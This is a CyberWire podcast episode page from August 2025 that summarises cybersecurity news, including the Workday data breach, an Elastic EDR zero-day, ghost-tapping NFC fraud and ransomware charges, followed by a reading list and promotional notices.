The CyberWire
Workday's bad day.

The CyberWire

Play Episode Listen Later Aug 18, 2025 26:56


HR software giant Workday discloses a data breach. Researchers uncover a zero-day in Elastic's EDR software. Ghost-tapping is an emerging fraud technique where cybercriminals use NFC relay attacks to exploit stolen payment card data. Germany may be on a path to ban ad blockers. A security researcher documents multiple serious flaws in McDonald's systems. There's a new open-source framework for testing 5G security flaws. New York's Attorney General sues the banks behind Zelle over fraud allegations. The DOJ charges the alleged Zeppelin ransomware operator and seizes over $2.8 million in cryptocurrency. Tim Starks from CyberScoop discusses the overlooked changes that two Trump executive orders could bring to cybersecurity. Bots build their own echo chambers. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.
CyberWire Guest
Today we have Tim Starks from CyberScoop discussing the overlooked changes that two Trump executive orders could bring to cybersecurity.
Selected Reading
HR giant Workday discloses data breach after Salesforce attack (Bleeping Computer)
Researchers report zero-day vulnerability in Elastic Endpoint Detection and Response Driver that enables system compromise (Beyond Machines)
Ghost-Tapping and the Chinese Cybercriminal Retail Fraud Ecosystem (Recorded Future)
Is Germany on the Brink of Banning Ad Blockers? User Freedom, Privacy, and Security Is At Risk. (Open Policy & Advocacy)
How I Hacked McDonald's (Their Security Contact Was Harder to Find Than Their Secret Sauce Recipe) (bobdahacker)
Boffins say tool can sniff 5G traffic, launch 'attacks' without using rogue base stations (The Register)
New York claims Zelle's shoddy security enabled a billion dollars in scams (The Verge)
US Seizes $2.8 Million From Zeppelin Ransomware Operator (SecurityWeek)
Researchers Made a Social Media Platform Where Every User Was AI. The Bots Ended Up at War (Gizmodo)
Audience Survey
Complete our annual audience survey before August 31.
Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices